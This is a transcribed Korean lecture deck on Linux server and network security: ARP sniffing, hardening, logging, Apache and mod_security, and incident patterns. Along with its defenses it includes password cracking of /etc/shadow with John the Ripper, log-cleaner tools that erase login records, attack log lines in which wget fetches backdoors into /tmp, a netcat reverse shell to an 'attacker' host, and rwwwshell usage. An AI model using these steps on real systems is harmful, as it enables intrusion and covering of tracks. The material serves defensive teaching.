PowerPoint 프레젠테이션

Transcription

1 리눅스시스템 / 네트워크보안 강사 : 홍석범 (antihong@tt.co.kr) 리눅스서버보안관리실무 저자 리눅스포털수퍼유저코리아

2 순서 1. 네트워크의큰그림을그려보자 - 선행이해사항확인 2. 리눅스시스템보안일반 3. 응용프로그램보안 xinetd 보안웹서버보안메일서버보안 DNS 서버보안 ftp 서버보안기타서버보안 (ssh 등 ) 4. 방화벽 (firewall) 구축및운영 5. 보안프로그램활용 6. 네트워크의취약성과대책 7. 네트워크모니터링을통한공격탐지 2

3 ARP(Address Resolution Protocol) RFC( RFC 826 번. * ARP 패킷헤더구성 소스 IP: 소스 MAC: 목적지 IP: 목적지 MAC: 요청 / 응답 * 로컬구간에서 TCP 접속시 ARP 교환후 3 Way-Handshake 시작. (tcpdump or windump 로확인!!) Windump : 3

4 # tcpdump e arp arp who-has tell 이 의 MAC 주소를알기위해브로드캐스트질의 arp reply :50:8b:9a:2e:a 의 MAC 주소가 (0:50:8b:9a:2e:a8) 임을응답함 arp cache timeout arp cache timeout: 리눅스 :60s, 스위치 :300s, 라우터4~5h CatOS> sh cam agingtime VLAN 1 aging time = 300 sec IOS>sh mac address-table aging-time Global 300 4

5 arp cache # arp -a? ( ) at 00:D0:B7:9A:25:20 [ether] on eth0? ( ) at 00:D0:B7:88:E8:0D [ether] on eth0 www44 ( ) at 00:01:02:54:C2:E7 [ether] on eth0? ( ) at <incomplete> on eth0 * arp d www44 ( 또는 ): arp 정보삭제 * arp s www44 00:D0:B7:88:E8:0D : arp 정보저장 ( ) at <incomplete> on eth1? eth1 을통해 의 MAC 주소를알려고했지만 timeout 시간인 5 초동안 의 MAC 주소를알지못한경우 5

6 < 라우터에서의 arp cache> # clear arp-cache ; arp cache 항목 clear # conf t (conf)# arp d0.b789.d700 ; arp 항목 static 하게설정 6

7 MAC-aging time 을임의로설정하는방법 # conf t # mac-address-table aging-time 0! disables aging of MAC table, will broadcast all ARP requests # mac-address-table aging-time 0 VLAN 2! disables aging of MAC table only for vlan 2 7

8 Gratuitous ARP : 접속을갱신하고자할때 (ARP cache 를업데이트함 ) ex)./send_arp B9A27A ffffffffffff piranha 또는 fake 라는패키지에속해있음. 에서질의 Unarp : arp 캐시를삭제함 Gratuitous ARP 와의차이점을이해 8

9 스위치및허브의차이 허브 스위치 10M 포트의허브에서는포트의수에관계없이최대대역폭은 10M 8 개포트의 100M 스위치는최대 800M 대역폭까지지원. 반이중방식 (half duplex) 만지원되므로송신, 수신은동시에한번만 전이중방식 (full duplex) 가지원되므로송신하면서수신이가능하여 collision 이없다. 9

10 < 두서버통신사이에 Arp cache 가없을때 > <Arp cache 가있을때 > 10

11 Dummy 환경 (1) arp 요청 (2) arp 응답 (3) tcp 3 way handshake (4) 데이터교환모두 broadcast Switch 환경 (1) arp 요청만이 broadcasting (2) arp 응답 (3) tcp 3 way handshake (4) 데이터교환모두 unicast 로작동 11

12 Sniffing 가능한이유 (1) Plain text 전송 (2) broadcast 등 이에대한대처방법 (1) dummy 대신 switch (2) 개별암호화전송프로토콜 (telnet ssh 등 ) (3) VPN(Virtual Private Network) 사용 (4) vlan, Pvlan 등사용 (5) port security 스니핑을위한필요조건 Promiscuous mode 12

13 dsniff- 스위치환경에서도스니핑이가능한 tool ARP spoofing MAC flooding Selective sniffing SSH / SSL Interception Dug Song, Author of dsniff 13

14 ARP 를이용한 sniffing(1) Switch Jam(MAC Flooding) 위조된 MAC 을지속적으로발생시켜스위치의 ARP 테이블을 Flood 시킨다. fail open (c2950 의경우 8,000 여개 MAC 인식가능 ) [root@hacker-lnx dsniff-2.3]#./macof ( 분당 155,000 개생성가능 ) > TCP D=55934 S=322 Syn Seq= Len=0 Win= > TCP D=44686 S=42409 Syn Seq= Len=0 Win= > TCP D=59038 S=21289 Syn Seq= Len=0 Win > TCP D=7519 S=34044 Syn Seq= Len=0 Win > TCP D=62807 S=53618 Syn Seq= Len=0 Win > TCP D=23929 S=51034 Syn Seq= Len=0 Wi > TCP D=1478 S=56820 Syn Seq= Len=0 Win= > TCP D=38433 S=31784 Syn Seq= Len=0 Win2 14

15 기억가능한 mac-addr 개수 6509>sh mac address-table count MAC Entries for all vlans : Dynamic Address Count: 469 Static Address (User-defined) Count: 6 Total MAC Addresses In Use: 475 Total MAC Addresses Available: 이후현상 > (broadcast) ARP C Who is , ? > (broadcast) ARP C Who is , ? > ICMP Echo request (ID: 256 Sequence number: 7424) > ICMP Echo reply (ID: 256 Sequence number: 7424) 15

16 ARP 를이용한 sniffing(2) * ARP Redirect 자신이마치 Gateway 인것처럼위조된 MAC 을 Broadcast 하여모든트래픽이통과하게한다. * ARP Spoofing 양서버사이에서스니핑하고자하는서버인것처럼 MAC 을위조하여트래픽을포워딩한다. * MAC duplicating 스니핑하고자하는서버의 MAC 주소와같은 MAC 주소를설정하는방법. * icmp redirect icmp-redirect 를이용, 라우팅테이블변경 16

17 Network 기반보안설정및점검프로그램 # Sentinel : # sniffdet ARP test Etherping test ping latency test DNS test # promisc 가아닌경우 tcpdump host e tcpdump: listening on eth0 0:2:b3:23:47:ca ff:0:0:0:0:0 ip 98 : remote.sniffer.detector > : icmp: echo request (DF) 0:2:b3:23:47:ca ff:0:0:0:0:0 ip 98: remote.sniffer.detector > : icmp: echo request (DF) <ICMP-promisc 인경우 > # promisc 인경우 tcpdump host e 0:2:b3:23:47:ca ff:0:0:0:0:0 ip 98: remote.sniffer.detector > : icmp: echo request (DF) 0:2:b3:23:33:14 0:2:b3:23:47:ca ip 60: > remote.sniffer.detector: icmp: echo reply 17

18 Network 기반보안설정및점검프로그램 # promiscan 참고사이트 예외 : 3com 계열 interface 스위치정상적인 promisc 모드장비등 18

19 ARPWatch 다운로드 : ftp://ftp.ee.lbl.gov/ MAC 벤더정보 ARP 트래픽을모니터링하여 MAC 주소와 IP 간매칭을감시하는프로그램으로정보가변경되거나새로운 MAC 주소가확인시관리자에게메일로통보. MAC 주소나 ARP를이용하는공격에대한대응에유용하다. Arpwatch -d 로실행시예 ) MAC 정보가변경시관리자에게메일로통보된내용 hostname: arp.abc.co.kr ip address: ethernet address: 0:0:1c:2:38:18 ethernet vendor: JDR Microdevices generic, NE2000 drivers old ethernet address: 0:50:bf:30:fe:50 old ethernet vendor: <unknown> timestamp: Monday, April 23, :49: previous timestamp: Monday, April 23, :11:

20 VPN- 터널링과압축, 암호화 Gateway-to-Gateway 방식 PC 나서버에서는별도의 VPN 프로그램설치가필요없다. Host-to-Gateway 방식 외근시사무실의네트워크에접속하고자할때 20

21 암호화프로토콜사용 -VPN Host-to-Host 방식 특정 PC( 서버 ) 와 PC( 서버 ) 간 VPN 통신시 # tcpdump -X port 5000 vpn.server.com.5000 > vpn.client.com.5000: 0x a383 d32f 4415 E...@.@.../D. 0x0010 d3db abb c 196d dd03 e1a0....m... 0x0020 b342 af4c dec 1e2b a12.B.L.H=..+.I$Tj. 0x0030 a22e f8c4 eb c5 66cc d...HvF!.f.A... 0x e 9f52 85d1 391c 7dc5 1a48 4ea7 777b 1~.R..9.}..HN.w{ 0x0050 9a57 vpn client 에서 vpn server 에 ping 을실행했을때터널링되고, 암호화된것을알수있다. 21

22 시스템보안일반 1. 사용하지않는서비스중지 2. 퍼미션및파일및파일시스템속성 (attribute) 변경 3. 커널파라미터조정으로시스템최적화방안 4. John the ripper를활용한암호관리방안 5. 포트 (port) 의개념과포트를활용한문제해결 6. 로그의기초사항 22

23 사용하지않는서비스중지 * ntsysv * chkconfig 예 ) chkconfig list grep 3:on chkconfig level 3 xinetd off * /etc/rc.d/rc3.d/s* 확인 killall -9 ev processname, kill -9 pid 23

24 퍼미션 /tmp (1777) sticky bit drwxrwxrwt root root tmp/ : 누구나쓰고읽을수있지만다른유저가생성한파일은삭제가불가능하다. SetUid(4511) = 4(4+1)11 -r-s--x--x root root /usr/bin/passwd 이파일을실행당시에는 root 가되어야만이 root 만이읽을수있는 /etc/shadow 파일을일반유저가변경할수있다. -r-s--x--x root root /usr/bin/passwd(4511) -r-x--x--x root root /usr/bin/passwd(0511) 의차이점. -r-s--x--x root root /usr/bin/passwd(4511) -r-s--x--x root root /usr/bin/passwd(4411) 의차이점. 24

25 퍼미션활용 quiz # abc 라는유저가 /tmp 디렉토리이하에있는파일삭제가능여부? -rwxrwxrwx nobody nobody no.txt # 자신의디렉토리이하에있는 nobody 소유의파일삭제불가여부? drwx abc abc test_dir/ -rw nobody nobody no.txt 25

26 왜공격자는 /tmp 디렉토리를이용하는가? drwxrwxrwt(1777) root root /tmp sticky bit 가설정된 1777 디렉토리 3 곳 /tmp /var/tmp /dev/shm /etc/fstab 에 noexec, nosuid 설정 /dev/sda10 /tmp ext3 defaults,noexec,nosuid /tmp 에직접실행시에러 [root@server /tmp]#./test.cgi bash:./test.cgi: Permission denied But!! [root@server /tmp]# perl /tmp/test.cgi /bin/sh /tmp/test.sh 는잘실행됨 chmod 700 /usr/bin/wget /usr/bin/lynx /usr/bin/curl 26

27 chattr 활용 1. Read Only File (or File System) 설정 developed by Remy Card(ext2 fs developer) 사용법 : chattr +-= [ASacdisu] filename + : 지정한옵션추가 : 지정한옵션삭제 = : 초기화 A : atime (Access time) 속성이변경되지않는다. atime 속성은 stat file 로확인가능하다. a: append( 추가 ) 만이가능하다. 주로로그파일에적당하다. i : Immutable 로추가, 변경, 삭제등이불가능하다. 27

28 chattr test # touch test # ls -la test -rw-r--r-- 1 root root test # lsattr test test # chattr +i test # lsattr test ----i--- test # rm test rm: remove write-protected file `test'? y rm: cannot unlink `test': Operation not permitted # chattr -i test # lsattr test test # rm test rm: remove `test'? y 28

29 파일시스템속성변경 설정가능한옵션 (/etc/fstab 에서설정 ) defaults : 모든기능을허용한다.(quota, read-write, suid등 ) noquota : user의 quota 설정을하지않는다. nosuid : SUID나 SGID의설정을허용하지않는다. nodev : 문자나특별한장치 ( 디바이스 ) 를허용하지않는다. noexec : 어떠한실행파일에대해서도실행을허용하지않는다 quota : 유저들의 quota 설정을허용한다. ro : 현재의파티션을읽기전용 (read-only) 으로마운트한다. rw : 현재의파티션을읽고쓰기 (read-write) 모드로마운트한다. suid : SUID나 SGID의사용을허가한다. 29

30 fstab 파일속성설정 변경전 ) /etc/fstab 에서 filesystem 설정변경 /dev/sda11 /tmp ext2 defaults /dev/sda6 /home ext2 defaults 변경후 ) /dev/sda11 /tmp ext2 defaults,rw,nosuid,nodev,noexec /dev/sda6 /home ext2 defaults,rw,nosuid,nodev 파일시스템을다시마운트하기 # mount /home -oremount # mount /tmp oremoun # cat /proc/mounts /dev/sda8 /home ext2 rw,nosuid /dev/sda13 /tmp ext2 rw,noexec,nosuid 로확인. 30

31 커널파라미터설정 sysctl a 모든매개변수를 disply 설정변경방법 (1) sysctl w kernel_parameter (2) /etc/sysctl.conf 설정후 network 재시작 (3) /etc/sysctl.conf 설정후 sysctl p /etc/sysctl.conf (4) echo nn > /proc/sys/net/ipv4/xxxx Soft level 커널튜닝의경우부팅후에는초기화되므로주의. 31

32 커널파라미터보안설정 sysctl -w net.ipv4.tcp_max_syn_backlog=1024 sysctl -w net.ipv4.tcp_syncookies=1 sysctl w net.ipv4.conf.all.accept_redirects=0 sysctl w net.ipv4.icmp_echo_ignore_broadcasts=1 sysctl w net.ipv4.conf.all.accept_source_route=0 sysctl w net.ipv4.ip_forward=0 sysctl w net.ipv4.icmp_echo_ignore_all=1 sysctl w net.ipv4.conf.all.log_martians=1 32

33 암호관리방안 john the ripper : [root@www root]# tar zxvfp john-1.7.tar.gz // 압축해제 [root@www root]# cd john-1.7/src // john-1.7/src 디렉토리로이동 [root@www src]# make linux-x86-any-elf // 컴파일 [root@www src]# cd../run/ // run 디렉토리로이동 [root@www run]#./unshadow /etc/passwd /etc/shadow > passwd.1 // 암호화된암호가저장된 passwd.1 파일생성 [root@www run]#./john passwd.1 // 암호해독시작 olympia (olympia) allmall (allmall) 33

34 사용하지않는계정중지 usedel, groupdel 등의명령어이용 /etc/passwd 에서사용하지않는계정 # 처리또는삭제 /etc/shadow 에서암호의차이 * -> User cannot login by password (may login by other means like ssh-key).! -> User cannot login at all. 34

35 Client 와 Server 의통신방식 Port 의개념 물리적인전송선은하나이지만그것을여러개의응용프로그램들이 서로나누어사용하기위해서도출된개념. * 0 ~ 1023 : Well known Port * 1024 ~ : Registered Port * ~ : Dynamic, Private Port Privileged,Well known, server, non-ephemeral Port : Unprivileged,high, client, ephemeral Port : ## 일반적인포트작동예외 bind 4.x : client 가 udp port 53 이용 syslog : client 가 udp 514 이용 netbios : 구 windows에서 client가 port 139 이용등 ## 리눅스에서설정가능한포트설정예. sysctl -w net.ipv4.ip_local_port_range=" 포트를모두사용시 error msg: Cannot assign requested address Resource temporary Unavailable 35

36 port 를이용한문제해결 /root]# netstat -na grep :25 tcp : :* LISTEN tcp : :3420 TIME_WAIT tcp : :36877 ESTABLISHED tcp : :3626 ESTABLISHED tcp : :3565 ESTABLISHED tcp : :4858 ESTABLISHED [root@www /root]# netstat -na grep :25 tcp : :* LISTEN tcp : :25 TIME_WAIT tcp : :25 ESTABLISHED tcp : :25 ESTABLISHED tcp : :25 ESTABLISHED 36

37 port 가사용하는프로그램확인 # netstat lnp 실행또는 fuser n tcp port# # ls la /proc/587 exe -> /home/user1/hacking/hacking (deleted) # cp /prod/587/exe /tmp/hacking 으로복구 37

38 포트관련사이트 포트에대한자세한안내 해당포트와관련된 IDS등의로그현황및악용된백도어등의정보 38

39 로그의기초사항 로그디렉토리 : /var/log 중요파일 (txt or binary) : 로그파일퍼미션조정 binary 는 strigns 이용 messages : syslogd 에의해생성된메시지, 각종접근기록 secure : 인증을필요로하는데몬에대한접근기록 xferlog : ftp 접속에대한기록 (man xferlog) maillog : mail 송수신에대한기록 lastlog : lastlog 에대한기록 wtmp : last 에대한기록지난달기록 : last f /var/log/wtmp.1 utmp : w, who, finger 에대한기록 (/var/run) 한접속이여러파일에중복적으로나타나는수가있음 39

40 messages 나 secure 에서확인된공격관련로그를기초로공격이성공하였는지여부는 last 등으로확인가능하다. last 는접속에성공한로그만보여주므로. zap(logcleaner 이용로그파일내용삭제 ) 에서 logcleaner 를다운후컴파일 #./logcleaner03 ip 주소 zap.c 를다운후컴파일 #./zap username 접속기록이모두사라짐 zap2.c 를다운후컴파일 #./zap2 username 접속기록이하나씩사라짐 40

41 로그파일특이사항 (1) # last hostsden pts Tue May 10 01:24-01:25 (00:01) dsn2000 pts Tue May 10 01:25-01:26 (00:01) tellme pts Tue May 10 00:28-00:29 (00:01) qwert pts Tue May 10 00:30-01:30 (00:00) 41

42 로그파일특이사항 (2) # tail -f /var/log/secure test in.telnetd : connect from test ipop3d : connect from test in.fingered : connect from test imapd : connect from "last message repeated 357 times" syslogd 에서는같은로그가연속적으로발생할경우로그사이즈를줄이고읽기쉽게하기위해위와같은형태의메시지를출력함 # 아래로그해석 ( 해킹 or not?) May 9 04:02:19 dctl su(pam_unix)[17410]: session opened for user news by (uid=0) May 9 04:02:19 dctl su(pam_unix)[17410]: session closed for user news 힌트 : (1) 로그생성시각 (4 시 2 분 ) 주목 (2) 로그인후바로로그아웃 42

43 로그보안설정 (1) 일정날짜마다적절히 rotation 기본적으로 /etc/cron.daily/logrotate 에서실행 /cron.hourly/ 로복사 로그파일의사이즈가큰경우예 /etc/logrotste.conf or /etc/logrotate.d/syslog /var/log/maillog { size =40M rotate 7 sharedscripts postrotate killall -HUP syslogd endscript } 43

44 로그보안설정 (2) 웹서버의예 <VirtualHost > ServerAdmin DocumentRoot /home/abc/public_html ServerName abc.com ServerAlias TransferLog " rotatelogs /home/abc/log/access_log 3600" LogFormat "%h %l %u %t "%r " %s %b "%{Referer}i " "%{User-agent}i "" </VirtualHost> # find /home/abc/public_html/ -mtime +3 -exec rm -f {} 44

45 원격지로그서버이용법 클라이언트의 /etc/syslog.conf #authpriv.* /var/log/secure 서버의 /etc/rc.d/init.d/syslogd start) echo -n "Starting system logger: " # we don't want the MARK ticks daemon syslogd -m 0 -r -h 서버쪽방화벽에서 514/udp open # iptables A INPUT p udp s client_ip d server_ip dport 514 j ACCEPT 45

46 Xinetd 보안 Inetd(Xinetd) 주의점 : Max. server instances per minute is 60 pop-3 stream tcp nowait.300 root /usr/sbin/tcpd ipop3d Instance 를 default 60 에서 150 으로설정함. service pop3 { disable = no server = /usr/sbin/ipop3d instances = 300 } 해당서비스 : pop3, telnet 등 Inetd 의경우 Tcp Wrapper 와함께설정되어접근통제 ( 통상적으로 hosts.deny 에서차단후 hosts.allow 에서허용 ). Tcp Wrapper 는 /etc/hosts.deny 와 /etc/hosts.allow 파일을통해적절히설정.(hosts.allow 를먼저참조후 hosts.deny 참조 ) 46

47 tcp wrapper 작동 Tcp wrapper 작동순서 1. hosts.allow 질의후매치되면허용. 2. hosts.allow 에매치하지않으면 hosts.deny 테스트. hosts.deny 에매치되면접속거부. 3. hosts.allow 와 hosts.deny 에매치되지않으면허용. Tcp wrapper 는 3 way handshake 접속과정에서 1 번만체크. 접속이이루어진후에는체크하지않는다. 47

48 hosts.allow/deny 파일 syntax hosts.allow 1. all:.kornet.net 2. in.ftpd: 1: local 머신과내부랜에서의접속 2: 접속 client 에 identd 가작동하고있어야 user 인증됨. hosts.deny all:all ======================================================= Only Inetd pop-3 stream tcp nowait root /usr/sbin/ipop3d ipop3d Tcp_Wrapper 를통한 Inetd pop-3 stream tcp nowait root /usr/sbin/tcpd ipop3d 48

49 xinetd 보안 참고사이트 : service pop3 { socket_type = stream wait = no user = root server = /usr/sbin/ipop3d only_from = /0 # Allows every client no_access = # Deny from instances = 30 log_on_success += USERID log_on_failure += USERID access_times = 2:00-9:00 12:00-24:00 # 접근가능한시간대를제한 rlimit_as = 8M # 사용가능한메모리를 8M 로제한 nice = -2 # 우선순위지정 (-20 부터 19 까지 ) } 49

50 웹서버보안 - httpd.conf 보안설정 user nobody 만약 root 로실행시문제점은? httpd 프로세스가동유저와이 user와의차이점은? port 80 For ports < 1023, you will need httpd to be run as root initially. ServerTokens Prod, expose_php = Off (php.ini) ServerTokens Prod : Server: Apache ServerTokens Min : Server: Apache/ ServerTokens OS : Server: Apache/ (Unix) ServerTokens Full : Server: Apache/ (Unix) PHP/ MyMod/1.2 arirang -s e Server: Apache Server: Apache/ (Unix) PHP/ Server: Apache/ (Unix) PHP/ Server: Apache Server: Microsoft-IIS/ Server: Microsoft-IIS/ Server: Apache 50

51 httpd.conf 보안설정 <Directory /> <LimitExcept GET POST> Order allow,deny deny from all </LimitExcept> </Directory> indexes 설정 <IfModule mod_userdir.c> UserDir disabled UserDir enabled user1, user2 </IfModule> </IfModule> # cat access_log* awk '{print $6}' sort uniq -c sort -rn "GET 3841 "POST 1096 "OPTIONS 112 "PROPFIND 25 "HEAD # cat access_log* grep HEAD [11/May/2005:07:07: ] "HEAD /test/06help/download/form1.zip HTTP/1.1" "-" "EMPAS_ROBOT" [13/May/2005:10:48: ] "HEAD / HTTP/1.1" " "Mozilla/4.0 (compatible; Netcraft Web Server Survey)" 51

52 httpd.conf 나.htaccess 를이용한웹접근제어 httpd.conf 이용시 <Directory /home/abc/> Order deny, allow 뒤쪽에선언된것이우선이자기본 Deny from all Allow from </Directory> 와 대역만접근가능. 이외 IP 대역에서접근시 404 Forbidden 에러. 52

53 .htaccess 파일을이용한접근제어 AuthName "Only Members" AuthType Basic AuthUserFile /usr/data/.htpasswd ErrorDocument 401 " ABC 직원만접근가능합니다. <Limit GET POST> require valid-user Satisfy all order deny,allow Satisfy all 두조건모두적합해야함. allow from any 하나만적합하면됨. allow from 미설정시 all 이기본설정값 deny from all </Limit> 53

54 .htaccess 파일을이용한접근제어 # htpasswd -c /usr/data/.htpasswd test New password: xxxx Re-type new password: xxxx Adding password for user test 54

55 .htaccess 이용시주의점 (p 94) 1. 문법에어긋날경우 500 error 2. 윈도우에서생성시확장자에.txt 가붙는문제 3..htaccess 적용시속도저하문제 ( 이론적 ) 4..htaccess /.htpasswd 의위치는웹에서접근불가하도록설정 <Files ~ "^\.ht"> Order allow,deny Deny from all </Files> 55

56 Webzip, Teleport 등일부 agent 프로그램차단 BrowserMatch "WebZIP" go_out BrowserMatch "Teleport" go_out BrowserMatch "GetRight" go_out <Directory /> Options ExecCGI Order allow,deny Allow from all SetEnvIFNoCase Referer "hananet" link_deny Deny from env=go_out SetEnvIFNoCase Referer "netian" link_deny </Directory> <FilesMatch "\.(avi mpg asf)$"> Order allow,deny allow from all deny from env=link_deny </FilesMatch> 56

57 기타설정 Timeout 용량이큰데이터를수신할때의시간이아님. 세션을맺은후아무런메시지가발생하지않을동안의대기시간 RLimitMEM RLimitCPU 10 <Directory /home/special/public_html/*> RLimitMEM </Directory> KeepAlive On/Off 의차이점 57

58 최근의공격진행방법 1. 웹 app 의취약성을이용한해킹시도로 nobody 권한획득 google 등검색엔진이용 2. wget, lynx 등을실행하여백도어코드 /tmp 에다운로드 3. 웹을통해임의의포트를 bind 하는백도어코드실행또는 reverse connection shell 실행 4. 해당포트로원격접속 5. kernel 의취약성을이용한 root 권한획득 6. 스니핑등각종 rootkit 설치 7. ssh 스캔또는 udp flooding DoS 공격시도 58

59 Why WebHacking?? -. ssh 나 sendmail, bind 등상대적으로각종데몬의취약성이많이사라짐에반해웹취약성은계속증가함 -. 로그를남기지않는경우도많고, 남는다하더라도공격관련로그를찾기가어려움 -. 방화벽의확산으로접속가능한포트가한정적임 59

60 웹 app 의취약성을이용한공격예 awstats 의취약성을이용한예 xx.xxx - - [26/Jan/2005:06:32: ] "GET /cgi-bin/awstats/awstats.pl?xxxx=%20/tmp; wget%20http:// HTTP/1.1" "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" xx.xxx - - [26/Jan/2005:06:34: ] "GET /cgi-bin/awstats/awstats.pl?xxx=%20/tmp; wget%20http:// HTTP/1.1" "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" technote 의취약성 ( 시스템명령어실행이가능함 ) 을이용한예 xxx.xxx - - [28/Oct/2004:10:59: ] "GET /cgi/b/t/board/main.cgi?board=free_board&command=xxxx_xxxx&xxxxxx= wget%20- P%20/tmp%20http://xxx.xxxxx.com/cavaleirosb1/xpl/rootedoor HTTP/1.1" "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)" 백도어파일업로드 제로보드의취약성 ( 외부소스실행 ) 을이용한예 php.ini 에서 allow_url_fopen = Off [14/Feb/2005:08:26: ] "GET /bbs//include/write.php? dir= HTTP/1.0" [14/Feb/2005:09:54: ] "GET dir= HTTP/1.0"

61 Open Source Web Application Firewall Request filtering Anti-evasion techniques POST payload analysis Audit logging HTTPS filtering 61

62 modsecurity 활용 <IfModule mod_security.c> # Turn the filtering engine On or Off SecFilterEngine On # Change Server: string SecServerSignature " Microsoft-IIS/5.0" # httpd.conf 에서 ServerTokens Prod 이용 # telnet sample.com 80 HEAD / HTTP/1.0 Apache/ (Unix) PHP/4.2.3 Via: 1.1 jaguar01 (Jaguar/3.0-71) # The audit engine works independently and can be turned On or Off on the per-server or # on the per-directory basis. "On" will log everything,"dynamicorrelevant" will log dynamic # requests or violations, and "RelevantOnly" will only log policy violations SecAuditEngine RelevantOnly # The name of the audit log file SecAuditLog logs/audit_log # Should mod_security inspect POST payloads SecFilterScanPOST On # Action to take by default SecFilterDefaultAction "deny,log,status:403" SecFilterSelective REQUEST_METHOD "!(GET POST HEAD)" deny,log,status:403 <Directory /> <LimitExcept GET POST> Order allow,deny deny from all </LimitExcept> </Directory> 62

63 # Require Content-Length to be provided with # every POST request SecFilterSelective REQUEST_METHOD "^POST$" chain SecFilterSelective HTTP_Content-Length "^$" SecFilterSelective ARG_username admin chain SecFilterSelective REMOTE_ADDR "!^ $ SecFilterSelective REMOTE_ADDR "^ $" nolog,allow SecFilterSelective THE_REQUEST "wget " SecFilterSelective THE_REQUEST lynx SecFilterSelective THE_REQUEST "mkdir" SecFilterSelective THE_REQUEST "/tmp" SecFilterSelective THE_REQUEST "/bin" SecFilterSelective THE_REQUEST "/admin_/" log,pass SecFilterSelective THE_REQUEST "/.bash_history" # WEB-CGI bash access SecFilterSelective THE_REQUEST "/bash" log,pass SecFilterSelective THE_REQUEST "awstats" chain SecFilterSelective ARGS "(pluginmode loadplugin debug configdir perl cgi chmod exec print)" 63

64 web log : [12/Oct/2004:16:07: ] "GET /command.php?/bin/chown HTTP/1.1" mod_security-message: Access denied with code 405. Pattern match "bin/" at THE_REQUEST. 64

65 ======================================== Request: 222.xx.xx.xx - - [30/May/2005:21:33: ] "POST /xxxxx.php HTTP/1.1" Handler: (null) POST /xxxxx.php HTTP/1.1 Host: xxxxxx.com Referer: mod_security-message: Access denied with code 500. Pattern match "/etc/passwd" at POST_PAYLOAD. mod_security-action: 500 command=cat+%2fetc%2fpasswd HTTP/ Internal Server Error Connection: close SecFilter : 모든 GET, POST 등모든데이터에대한검사 SecFilterSelective : REMOTE_ADDR, REMOTE_HOST, REMOTE_USER REMOTE_IDENT, REQUEST_METHOD 등모든 cgi 변수 65

66 SecFilterSelective OUTPUT "Fatal error:" deny,status:500 ErrorDocument 500 /php-fatal-error.html SecFilterOutputMimeTypes "(null) text/html text/plain" # output 은 html 이나 txt 만모니터링하도록설정 <Location /cgi-bin/formmail> # Reject request where the value of parameter "recipient" # does not end with "@webkreator.com" SecFilterSelective ARG_recipient "!@webkreator.com$"> </Location> SecUploadDir /tmp SecUploadKeepFiles On SecUploadApproveScript /full/path/to/the/script.sh # 업로드되는파일에대해바이러스체크등 SecFilter "delete[[:space:]]+from" SecFilter "insert[[:space:]]+into" SecFilter "select.+from SecFilter "drop[[:space:]]table" </IfModule> DROP%20TABLE%20users-- 66

67 기존백도어방식 기존방식의한계 (1) 관리자의눈에쉽게띈다. (2) 방화벽이설치되어있는경우원격에서해당포트로의직접접근이불가하다. 67

68 reverse telnet 의원리 (1) attacker 에서임의의포트로 bind 한후대기 (nc -l p 80) (2) 웹해킹을이용, nobody 권한획득 (3) victim 에서 nc attacker 80 e /bin/sh 실행 attacker (4) 이후 attacker 에서입력하는명령어는 victim 에서실행 victim 68

69 reverse telnet-rwwwshell 예 slave(victim) : $ perl rwwwshell-2.0.pl slave starting in slave mode master(attacker) : # perl rwwwshell-2.0.pl master Waiting for connect... connect from victim.server.com:58745 bash$ w master 에서명령어를입력하면 slave 에서실행됨 03/14-17:03: 공격자시스템 :80 -> slave 시스템 :38796 TCP TTL:63 TOS:0x0 ID:64287 IpLen:20 DgmLen:116 DF ***AP*** Seq: 0x353C015E Ack: 0x2711C1B Win: 0x1920 TcpLen: F 31 2E F 4B 0D HTTP/ OK. 0A 43 6F 6E 6E F 6E 3A C 6F.Connection: clo D 0A 43 6F 6E E 74 2D se..content-type 3A F 70 6C E 0D 0A 0D 0A : text/plain... 6F 35 6D 41 6C A 0D 0A o5malaphtz.. 명령어가 encoding 됨 03/14-17:03: slave 시스템 : > 공격자시스템 :80 TCP TTL:64 TOS:0x0 ID:10925 IpLen:20 DgmLen:450 DF ***AP*** Seq: 0x436B1FE Ack: 0x366E299D Win: 0x16D0 TcpLen: F D E 2F 6F GET /cgi-bin/ord F 72 6D 3F 4D 35 6D 41 6C F erform?m5malapio 6A F 6A B B 72 jgcojchr+wqrfvkr D E f75sasqb92qmfw5n ag5dsbtr5gurf6pu A 4D 2B B fg0rzm+wqrfvkr F r8FpOasqYfW4rfF 명령어의결과가 encoding 되어전달됨 69

70 reverse telnet 의장점 (1) 로그 (log) 에남지않는다. (2) 관리자가알기어렵다. (3) 방화벽을우회할수있다. (4) nc 외다양한 script 가존재한다. $./conback.pl Usage:./conback.pl ip port * reverse telnet 대응방법 방화벽보안설정을변경하여 inbound 뿐만아니라 outbound 에대해서도엄격히정책을통제한다. 70

71 웹해킹후 DoS 공격실행예 71

72 UDP flooding 공격시 PPS 증가 udp flooding 에대한대책 iptables -P INPUT ACCEPT iptables -P OUTPUT ACCEPT iptables -F INPUT iptables -F OUTPUT iptables -A INPUT -m state --state ESTABLISHED,RELATED -j ACCEPT iptables -A OUTPUT -m state --state ESTABLISHED,RELATED -j ACCEPT iptables -A OUTPUT -p udp! --dport 53 -m state --state NEW -j DROP 72

73 메일서버 (sendmail) 보안 1. SMTP relay (1) relay 가허용된메일서버를통해직접발송 (2) formmail 등웹 app 의취약성을이용하여발송 (3) open 된 proxy 등을통해발송 ("CONNECT smtp.rol.ru:25 HTTP/1.0 ) 2. sendmail.cf 보안설정 3. 스팸, 바이러스대응방안 73

74 반송메시지의의미 Sorry,access denied( xx).your mail server sent too many e- mails to us(1200).spammer may abuse your mail server for mail relay.if you are not the system administrator,inform this message to your system administrator. DNS resolving error --> 수신하는쪽서버의도메인을찾지못해반송된경우 Insufficient disk space; try again later 수신하는쪽서버의디스크용량이부족 74

75 반송메시지의의미 sorry, that domain isn't in my list of allowed rcpt hosts --> 일부메일서버에서는허용된발신메일주소만을허용하고나머지는거부하는경우 Domain of sender address does not exist --> 수신하는쪽메일서버에서발신도메인을존재하지않는도메인으로인식하여반송 delivery error: Sorry, your message to cannot be delivered. This account is over quota. Your host does not have reverse dns entry. Please Contact your internet services provider 75

76 정상적인 Mail 전송시 Header pop.receive.com mail.smtp.com Received: from mail.smtp.com (mail.smtp.com [ ] by pop.receive.com (8.11.6/8.11.6) with ESMTP id UAA06615 for Wed, 5 Feb :04: (KST) Received: from sender.com (sender.com)[ ] by mail.smtp.com (ipl/ipl) with ESMTP id UAA46506 for <mail@receive.com>; Wed, 5 Feb :04: (KST) Received: by sender.com with Microsoft Mail id <01BD31A7.B4C12C20@sender.com> Wed, 5 Feb :01: (KST) sender.com 76

